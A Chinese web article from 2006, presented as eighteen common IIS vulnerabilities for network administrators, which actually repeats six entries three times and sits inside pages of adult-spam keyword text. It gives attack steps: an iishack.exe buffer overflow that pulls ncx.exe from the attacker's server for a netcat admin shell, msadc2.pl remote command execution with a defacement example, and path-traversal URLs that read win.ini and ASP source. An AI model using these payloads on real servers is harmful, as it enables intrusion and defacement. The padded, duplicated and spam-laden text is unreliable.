国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区

掃一掃
關注微信公眾號

網管必知:IIS中常見的十八個安全漏洞
2006-04-11   

1. IIS4hack緩沖溢出

  主要存在于.htr,.idc和.stm文件中,其對關于這些文件的URL請求沒有對名字進行充分的邊界檢查,導致運行攻擊者插入一些后門程序 在系統中下載和執行程序。要檢測這樣的站點你需要兩個文件iishack.exe,ncx.exe,你可以到下面 的站點www.technotronic.com去下載,另外你還需要一臺自己的WEB服務器。你現在你自己的WEB服務器上運行WEB服務程序并把ncx.exe放到你自己相應的目錄下,然后使用iishack.exe來檢查目標機器:

  c:>iishack.exe 80 /ncx.exe

  然后你就使用netcat來連接你要檢測的服務器:

  c:>nc 80

  如果溢出點正確你就可以看到目標機器的命令行提示,并且是管理遠權限。利用程序見iis4hack.zip

  2.msadc

  IIS的MDAC組件存在一個漏洞可以導致攻擊者遠程執行你系統的命令。主要核心問題是存在于RDS Datafactory,默認情況下, 它允許遠程命令發送到IIS服務器中,這命令會以設備用戶的身份運行,其一般默認情況下是SYSTEM用戶。利用程序為msadc2.pl,我們看看它的help

  [quack@chat quack]$ perl msadc2.pl -h

  -- RDS smack v2 - rain forest puppy / ADM / wiretrip --

  Usage: msadc.pl -h { -d -X -v }

  -h = host you want to scan (ip or domain)

  -d = delay between calls, default 1 second

  -X = dump Index Server path table, if available

  -N = query VbBusObj for NetBIOS name

  -V = use VbBusObj instead of ActiveDataFactory

  -v = verbose

  -e = external dictionary file for step 5

  -u <hostsharefile> = use UNC file

  -w = Windows 95 instead of Windows NT

  -c = v1 compatibility (three step query)

  -s = run only step

  Or a -R will resume a (v2) command session

  [quack@chat quack]$ perl msadc2.pl -hhttp://www.targe.com/

  -- RDS smack v2 - rain forest puppy / ADM / wiretrip --

  Type the command line you want to run (cmd /c assumed):

  cmd /c

  如果出現cmd /c后,直接鍵入命令行,就可以以system權限執行命令了。比如xundi教的:

  echo hacked by me > d:inetpubwwwrootvictimwebindex.htm

3.Codebrws.asp

  察看文件源代碼

  http://www.victim.com/iisamples/exair/howitworks/codebrws.asp?source=/iisamples/exair/howitworks/codebrws.asp

  4.Showcode.asp

  察看文件源代碼

  http://www.victim.com/msadc/samples/selector/showcode.asp?source=/msadc/../../../../../winnt/win.ini

  5.Null.htw

  察看文件源代碼

  http://www.victim.com/null.htw?CiWebhitsfile=/default.asp%20&%20CiRestriction=none%20&%20&CiHiliteType=full

  6.webhits.dll & .htw

  hit-highligting功能是由Index Server提供的允許一個WEB用戶在文檔上highlighted(突出)他們原始搜索的條目,這個文檔的名字通過變量CiWebhitsfile傳遞給.htw文件,Webhits.dll是一個ISAPI應用程序 來處理請求,打開文件并返回結果,當用戶控制了CiWebhitsfile參數傳遞給.htw時,他們就可以請求任意文件,結果就是導致查看ASP源碼和其他腳本文件內容。要了解你是否存在這個漏洞,你可以請求如下條目:

  http://www.victim.com/nosuchfile.htw 如果你從服務器端獲得如下信息:

  format of the QUERY_STRING is invalid這就表示你存在這個漏洞 .這個問題主要就是webhits.dll關聯了.htw文件的映射,所以你只要取消

  這個映射就能避免這個漏洞,你可以在你認為有漏洞的系統中搜索.htw文件,一般會發現如下的程序:

  /iissamples/issamples/oop/qfullhit.htw

  /iissamples/issamples/oop/qsumrhit.htw

  /isssamples/exair/search/qfullhit.htw

  /isssamples/exair/search/qsumrhit.htw

  /isshelp/iss/misc/iirturnh.htw (這個一般為loopback使用)

  一個攻擊者可以使用如下的方法來訪問系統中文件的內容:

  http://www.victim.com/iissamples/issamples/oop/qfullhit.htw?

  ciwebhitsfile=/../../winnt/win.ini&cirestriction=none&cihilitetype=full

  就會在有此漏洞系統中win.ini文件的內容。 7.ASP Alternate Data Streams(::$DATA) 要查看一些.asp文件的內容,你可以請求如下的URL: http://www.victim.com/default.asp::$DATA你就得到了源代碼

  7. iis4hack緩沖溢出

  主要存在于.htr,.idc和.stm文件中,其對關于這些文件的URL請求沒有對名字進行充分的邊界檢查,導致運行攻擊者插入一些后門程序 在系統中下載和執行程序。要檢測這樣的站點你需要兩個文件iishack.exe,ncx.exe,你可以到下面 的站點www.technotronic.com去下載,另外你還需要一臺自己的WEB服務器。你現在你自己的WEB服務器上運行WEB服務程序并把ncx.exe放到你自己相應的目錄下,然后使用iishack.exe來檢查目標機器:

  c:>iishack.exe 80 /ncx.exe

  然后你就使用netcat來連接你要檢測的服務器:

  c:>nc 80

  如果溢出點正確你就可以看到目標機器的命令行提示,并且是管理遠權限。利用程序見iis4hack.zip

  8.msadc

  IIS的MDAC組件存在一個漏洞可以導致攻擊者遠程執行你系統的命令。主要核心問題是存在于RDS Datafactory,默認情況下, 它允許遠程命令發送到IIS服務器中,這命令會以設備用戶的身份運行,其一般默認情況下是SYSTEM用戶。利用程序為msadc2.pl,我們看看它的help

  [quack@chat quack]$ perl msadc2.pl -h

  -- RDS smack v2 - rain forest puppy / ADM / wiretrip --

  Usage: msadc.pl -h { -d -X -v }

  -h = host you want to scan (ip or domain)

  -d = delay between calls, default 1 second

  -X = dump Index Server path table, if available

  -N = query VbBusObj for NetBIOS name

  -V = use VbBusObj instead of ActiveDataFactory

  -v = verbose

  -e = external dictionary file for step 5

  -u <hostsharefile> = use UNC file

  -w = Windows 95 instead of Windows NT

  -c = v1 compatibility (three step query)

  -s = run only step

  Or a -R will resume a (v2) command session

  [quack@chat quack]$ perl msadc2.pl -hhttp://www.targe.com/

  -- RDS smack v2 - rain forest puppy / ADM / wiretrip --

  Type the command line you want to run (cmd /c assumed):

  cmd /c

  如果出現cmd /c后,直接鍵入命令行,就可以以system權限執行命令了。比如xundi教的:

  echo hacked by me > d:inetpubwwwrootvictimwebindex.htm

9.Codebrws.asp

  察看文件源代碼

  http://www.victim.com/iisamples/exair/howitworks/codebrws.asp?source=/iisamples/exair/howitworks/codebrws.asp

  10.Showcode.asp

  察看文件源代碼

  http://www.victim.com/msadc/samples/selector/showcode.asp?source=/msadc/../../../../../winnt/win.ini

  11.Null.htw

  察看文件源代碼

  http://www.victim.com/null.htw?CiWebhitsfile=/default.asp%20&%20CiRestriction=none%20&%20&CiHiliteType=full

  12.webhits.dll & .htw

  hit-highligting功能是由Index Server提供的允許一個WEB用戶在文檔上highlighted(突出)他們原始搜索的條目,這個文檔的名字通過變量CiWebhitsfile傳遞給.htw文件,Webhits.dll是一個ISAPI應用程序 來處理請求,打開文件并返回結果,當用戶控制了CiWebhitsfile參數傳遞給.htw時,他們就可以請求任意文件,結果就是導致查看ASP源碼和其他腳本文件內容。要了解你是否存在這個漏洞,你可以請求如下條目:

  http://www.victim.com/nosuchfile.htw 如果你從服務器端獲得如下信息:

  format of the QUERY_STRING is invalid這就表示你存在這個漏洞 .這個問題主要就是webhits.dll關聯了.htw文件的映射,所以你只要取消

  這個映射就能避免這個漏洞,你可以在你認為有漏洞的系統中搜索.htw文件,一般會發現如下的程序:

  /iissamples/issamples/oop/qfullhit.htw

  /iissamples/issamples/oop/qsumrhit.htw

  /isssamples/exair/search/qfullhit.htw

  /isssamples/exair/search/qsumrhit.htw

  /isshelp/iss/misc/iirturnh.htw (這個一般為loopback使用)

  一個攻擊者可以使用如下的方法來訪問系統中文件的內容:

  http://www.victim.com/iissamples/issamples/oop/qfullhit.htw?

  ciwebhitsfile=/../../winnt/win.ini&cirestriction=none&cihilitetype=full

  就會在有此漏洞系統中win.ini文件的內容。 7.ASP Alternate Data Streams(::$DATA) 要查看一些.asp文件的內容,你可以請求如下的URL: http://www.victim.com/default.asp::$DATA你就得到了源代碼

  13. iis4hack緩沖溢出

  主要存在于.htr,.idc和.stm文件中,其對關于這些文件的URL請求沒有對名字進行充分的邊界檢查,導致運行攻擊者插入一些后門程序 在系統中下載和執行程序。要檢測這樣的站點你需要兩個文件iishack.exe,ncx.exe,你可以到下面 的站點www.technotronic.com去下載,另外你還需要一臺自己的WEB服務器。你現在你自己的WEB服務器上運行WEB服務程序并把ncx.exe放到你自己相應的目錄下,然后使用iishack.exe來檢查目標機器:

  c:>iishack.exe 80 /ncx.exe

  然后你就使用netcat來連接你要檢測的服務器:

  c:>nc 80

  如果溢出點正確你就可以看到目標機器的命令行提示,并且是管理遠權限。利用程序見iis4hack.zip

  14.msadc

  IIS的MDAC組件存在一個漏洞可以導致攻擊者遠程執行你系統的命令。主要核心問題是存在于RDS Datafactory,默認情況下, 它允許遠程命令發送到IIS服務器中,這命令會以設備用戶的身份運行,其一般默認情況下是SYSTEM用戶。利用程序為msadc2.pl,我們看看它的help

  [quack@chat quack]$ perl msadc2.pl -h

  -- RDS smack v2 - rain forest puppy / ADM / wiretrip --

  Usage: msadc.pl -h { -d -X -v }

  -h = host you want to scan (ip or domain)

  -d = delay between calls, default 1 second

  -X = dump Index Server path table, if available

  -N = query VbBusObj for NetBIOS name

  -V = use VbBusObj instead of ActiveDataFactory

  -v = verbose

  -e = external dictionary file for step 5

  -u <hostsharefile> = use UNC file

  -w = Windows 95 instead of Windows NT

  -c = v1 compatibility (three step query)

  -s = run only step

  Or a -R will resume a (v2) command session

  [quack@chat quack]$ perl msadc2.pl -hhttp://www.targe.com/

  -- RDS smack v2 - rain forest puppy / ADM / wiretrip --

  Type the command line you want to run (cmd /c assumed):

  cmd /c

  如果出現cmd /c后,直接鍵入命令行,就可以以system權限執行命令了。比如xundi教的:

  echo hacked by me > d:inetpubwwwrootvictimwebindex.htm

15.Codebrws.asp

  察看文件源代碼

  http://www.victim.com/iisamples/exair/howitworks/codebrws.asp?source=/iisamples/exair/howitworks/codebrws.asp

  16.Showcode.asp

  察看文件源代碼

  http://www.victim.com/msadc/samples/selector/showcode.asp?source=/msadc/../../../../../winnt/win.ini

  17.Null.htw

  察看文件源代碼

  http://www.victim.com/null.htw?CiWebhitsfile=/default.asp%20&%20CiRestriction=none%20&%20&CiHiliteType=full

  18.webhits.dll & .htw

  hit-highligting功能是由Index Server提供的允許一個WEB用戶在文檔上highlighted(突出)他們原始搜索的條目,這個文檔的名字通過變量CiWebhitsfile傳遞給.htw文件,Webhits.dll是一個ISAPI應用程序 來處理請求,打開文件并返回結果,當用戶控制了CiWebhitsfile參數傳遞給.htw時,他們就可以請求任意文件,結果就是導致查看ASP源碼和其他腳本文件內容。要了解你是否存在這個漏洞,你可以請求如下條目:

  http://www.victim.com/nosuchfile.htw 如果你從服務器端獲得如下信息:

  format of the QUERY_STRING is invalid這就表示你存在這個漏洞 .這個問題主要就是webhits.dll關聯了.htw文件的映射,所以你只要取消

  這個映射就能避免這個漏洞,你可以在你認為有漏洞的系統中搜索.htw文件,一般會發現如下的程序:

  /iissamples/issamples/oop/qfullhit.htw

  /iissamples/issamples/oop/qsumrhit.htw

  /isssamples/exair/search/qfullhit.htw

  /isssamples/exair/search/qsumrhit.htw

  /isshelp/iss/misc/iirturnh.htw (這個一般為loopback使用)

  一個攻擊者可以使用如下的方法來訪問系統中文件的內容:

  http://www.victim.com/iissamples/issamples/oop/qfullhit.htw?

  ciwebhitsfile=/../../winnt/win.ini&cirestriction=none&cihilitetype=full

  就會在有此漏洞系統中win.ini文件的內容。 7.ASP Alternate Data Streams(::$DATA) 要查看一些.asp文件的內容,你可以請求如下的URL:http://www.victim.com/default.asp::$DATA你就得到了源代碼

熱詞搜索:

上一篇:VoIP協議 無法忽略的安全隱患之痛
下一篇:垃圾郵件管理辦法引發多重影響

分享到: 收藏
国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区
欧美在线观看视频一区二区| 欧美在线你懂得| 奇米影视一区二区三区| 一区二区久久久久久| 一区二区三区在线免费| 一区二区三区在线高清| 亚洲激情综合网| 亚洲国产cao| 日韩专区在线视频| 免费精品视频在线| 国产米奇在线777精品观看| 国产一区二区三区在线观看精品 | 成人黄色小视频| 丁香啪啪综合成人亚洲小说 | 欧美羞羞免费网站| 欧美午夜一区二区三区免费大片| 日本韩国一区二区三区视频| 在线一区二区三区做爰视频网站| 色婷婷一区二区三区四区| 欧美在线你懂的| 日韩精品一区二区三区中文不卡 | 一级女性全黄久久生活片免费| 亚洲最大的成人av| 久久精品72免费观看| 国产成人精品一区二区三区四区| 99久久精品免费看| 欧美精品v日韩精品v韩国精品v| 日韩一区二区三区三四区视频在线观看| 日韩一级完整毛片| 亚洲欧洲无码一区二区三区| 亚洲午夜在线电影| 国产又黄又大久久| 99久久国产免费看| 欧美xxxx在线观看| 亚洲精品免费看| 玖玖九九国产精品| 91国在线观看| 国产亚洲综合色| 亚洲高清免费观看| 成人av电影在线网| 精品久久久久久久久久久久久久久久久| 国产精品色噜噜| 青椒成人免费视频| 色999日韩国产欧美一区二区| 日韩欧美国产精品一区| 亚洲免费在线电影| 精品一区二区三区日韩| 色综合亚洲欧洲| 久久亚洲一区二区三区明星换脸 | 亚洲国产精品高清| 日本伊人色综合网| 色综合天天综合网天天看片| 精品欧美一区二区在线观看| 亚洲一区在线视频| av在线不卡免费看| 国产日韩综合av| 狠狠色综合日日| 日韩一区二区免费电影| 亚洲国产日韩av| 91视频一区二区| 国产精品视频免费看| 国产精品自拍av| 久久美女高清视频| 蜜桃精品在线观看| 4438成人网| 日韩精品乱码免费| 91.com视频| 日韩电影在线一区二区| 欧美视频中文一区二区三区在线观看| 亚洲色图第一区| 99国产精品国产精品久久| 中国色在线观看另类| 丁香桃色午夜亚洲一区二区三区| 精品国产麻豆免费人成网站| 毛片av中文字幕一区二区| 日韩小视频在线观看专区| 蜜桃在线一区二区三区| 日韩欧美一区二区视频| 国模少妇一区二区三区| 国产亚洲欧美激情| av亚洲精华国产精华精| 1区2区3区国产精品| 色婷婷综合久久久中文一区二区| 中文字幕一区二区三区视频| av激情综合网| 亚洲免费在线视频一区 二区| 色婷婷综合久色| 五月婷婷色综合| 日韩精品一区二| 国产一区二区0| 亚洲猫色日本管| 欧美丰满少妇xxxxx高潮对白| 另类人妖一区二区av| 国产欧美日韩不卡免费| 91香蕉视频黄| 日本欧美在线观看| 国产农村妇女毛片精品久久麻豆 | 亚洲国产精品久久一线不卡| 欧美视频精品在线观看| 麻豆精品久久精品色综合| 久久综合精品国产一区二区三区 | 午夜伦理一区二区| 17c精品麻豆一区二区免费| 色999日韩国产欧美一区二区| 日韩精品色哟哟| 国产色婷婷亚洲99精品小说| 色就色 综合激情| 九九九精品视频| 亚洲欧美日韩中文播放| 日韩亚洲欧美成人一区| 成人av免费观看| 美女一区二区三区在线观看| 国产精品传媒视频| 日韩视频免费观看高清在线视频| 成人精品免费网站| 免费观看一级欧美片| 中文字幕日本不卡| 欧美大肚乱孕交hd孕妇| 成人黄色电影在线| 男女激情视频一区| 亚洲女人的天堂| 国产日韩欧美在线一区| 91麻豆精品国产自产在线观看一区 | 国产福利一区二区三区视频在线| 亚洲人成网站色在线观看| 久久久久久黄色| 欧美一级日韩一级| 欧美日精品一区视频| 暴力调教一区二区三区| 久久精品国产精品亚洲红杏| 亚洲综合一区二区三区| 国产精品久久二区二区| 欧美精品一区二| 日韩一区二区免费高清| 欧美日韩久久一区二区| 色视频一区二区| 99精品久久免费看蜜臀剧情介绍| 国产一区二区三区免费播放| 日韩电影在线免费看| 亚洲成人av一区二区三区| 一区二区三区在线看| 日韩理论片在线| 亚洲特黄一级片| 椎名由奈av一区二区三区| 久久久久九九视频| 久久一留热品黄| www国产精品av| 精品国产免费人成在线观看| 欧美一区二区三区公司| 337p亚洲精品色噜噜噜| 欧美麻豆精品久久久久久| 精品视频在线看| 91精品欧美综合在线观看最新| 在线观看国产91| 欧美日韩日本视频| 欧美精品第1页| 日韩一级片网站| 26uuuu精品一区二区| 久久色在线观看| 日本一区二区不卡视频| 1区2区3区欧美| 亚洲一区在线观看免费观看电影高清 | 久久久久久久综合日本| 欧美激情在线观看视频免费| 国产精品久久久久影院老司| 亚洲欧洲日韩综合一区二区| 亚洲欧美成aⅴ人在线观看| 亚洲国产日韩a在线播放性色| 午夜av区久久| 国产精品888| 日韩免费观看高清完整版| 精品福利在线导航| 亚洲国产高清不卡| 亚洲综合久久久久| 日韩电影一区二区三区| 国产精品主播直播| 91成人在线免费观看| 日韩欧美久久一区| 中文字幕欧美一| 免费成人av在线| 99久久精品情趣| 91精品福利在线一区二区三区 | 国产三级久久久| 香蕉影视欧美成人| 国产成人亚洲综合a∨婷婷图片| 成人av高清在线| 欧美一区二区三区视频免费| 久久久久久久久岛国免费| 有码一区二区三区| 精品一区二区三区蜜桃| 99久久久国产精品| 欧美成人艳星乳罩| 亚洲永久免费av| 岛国一区二区在线观看| 欧美一区国产二区| 亚洲美女在线一区| 国产成人高清视频| 日韩一区二区在线看| 亚洲欧洲综合另类| 成人性生交大合|